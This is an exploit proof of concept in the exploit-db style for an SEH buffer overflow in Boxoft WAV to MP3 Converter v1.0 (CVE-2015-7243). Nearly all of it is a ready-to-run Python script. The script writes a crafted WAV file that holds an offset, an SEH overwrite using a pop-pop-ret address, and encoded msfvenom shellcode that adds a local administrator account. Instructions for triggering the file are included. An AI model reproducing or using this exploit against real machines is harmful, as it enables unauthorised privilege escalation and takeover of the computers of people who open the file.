# Exploit Title: Boxoft WAV to MP3 Converter - SEH Based Buffer Overflow Exploit # Date: 31/5/2016 # Exploit Author: Mandar # Vendor Homepage: http://www.boxoft.com/wav-to-mp3/ # Software Link: http://www.boxoft.com/wav-to-mp3/setup(free-wav-to-mp3).exe # Version: Boxoft WAV to MP3 Converter v1.0 # Tested on: Windows XP SP3, Windows 7 SP1 (64 bit), Windows 8.1, Windows 10 (64 bit) # CVE : CVE-2015-7243 # Reference : https://www.exploit-db.com/exploits/38035/ # Category: Local Exploit # Steps to reproduce: # - Run the Boxoft WAV to MP3 Converter and select batch convert mode and hit next # - Add exploit.wav file (generated by the PoC) and hit the convert to mp3 option # - User "Hack" (pass-Hack@123) will be added to the local administrative group. #!/usr/bin/python import sys, struct file="exploit.wav" junk = "\x41" * 4132 #offset to Next SEH endofbuff = "\x42" * 5300 #junk nseh = "\xeb\x06\x90\x90" # hop over SEH seh = "\xd3\x24\x40\x00" # pop ecx pop ebp ret (C:\Program Files (x86)\Boxoft Wav to MP3 (freeware)\wavtomp3.exe) #msfvenom -a x86 --platform windows -p windows/adduser USER=hack PASS=Hack@123 -e x86/shikata_ga_nai -b "\x00" EXITFUNC=process -f python buf = "" buf += "\xdb\xc0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x43\xb8\x27" buf += "\x27\x79\xee\x31\x47\x19\x03\x47\x19\x83\xc7\x04\xc5" buf += "\xd2\x85\x06\x8b\x1d\x76\xd7\xeb\x94\x93\xe6\x2b\xc2" buf += "\xd0\x59\x9b\x80\xb5\x55\x50\xc4\x2d\xed\x14\xc1\x42" buf += "\x46\x92\x37\x6c\x57\x8e\x04\xef\xdb\xcc\x58\xcf\xe2" buf += "\x1f\xad\x0e\x22\x7d\x5c\x42\xfb\x0a\xf3\x73\x88\x46" buf += "\xc8\xf8\xc2\x47\x48\x1c\x92\x66\x79\xb3\xa8\x31\x59" buf += "\x35\x7c\x4a\xd0\x2d\x61\x76\xaa\xc6\x51\x0d\x2d\x0f" buf += "\xa8\xee\x82\x6e\x04\x1d\xda\xb7\xa3\xfd\xa9\xc1\xd7" buf += "\x80\xa9\x15\xa5\x5e\x3f\x8e\x0d\x15\xe7\x6a\xaf\xfa" buf += "\x7e\xf8\xa3\xb7\xf5\xa6\xa7\x46\xd9\xdc\xdc\xc3\xdc" buf += "\x32\x55\x97\xfa\x96\x3d\x4c\x62\x8e\x9b\x23\x9b\xd0" buf += "\x43\x9c\x39\x9a\x6e\xc9\x33\xc1\xe4\x0c\xc1\x7f\x4a" buf += "\x0e\xd9\x7f\xfb\x66\xe8\xf4\x94\xf1\xf5\xde\xd0\x0d" buf += "\xbc\x43\x70\x85\x19\x16\xc0\xc8\x99\xcc\x07\xf4\x19" buf += "\xe5\xf7\x03\x01\x8c\xf2\x48\x85\x7c\x8f\xc1\x60\x83" buf += "\x3c\xe2\xa0\xe0\xaf\x78\x65\x82\x57\xe5\x59\x63\xcb" buf += "\xc5\xf7\x1e\x7f\x25\x7d\x92\x1a\x57\x5d\x3c\x84\xf4" buf += "\xf6\x9c\x0e\x9b\x6b\xb6\xce\x6a\x5e\x7b\xef\xa3\xdf" buf += "\x3f\xab\x9b\xf9\x99\x13\xb5\x60\x92\x73\x25\x04\x39" buf += "\x15\xd9\xbd\xcf\xba\x54\x32\x10\x04\xf2\xdf\x39\xe8" buf += "\x93\x6c\xce\x86\x02\xe7\x41\x15\xb7\x27\xf6\xb8\x54" buf += "\x43\x26\x14\xdb\xd7\x62\x6a" nop = "\x90" * 10 payload = junk + nseh + seh + nop + buf + endofbuff writeFile = open (file, "w") writeFile.write( payload ) writeFile.close()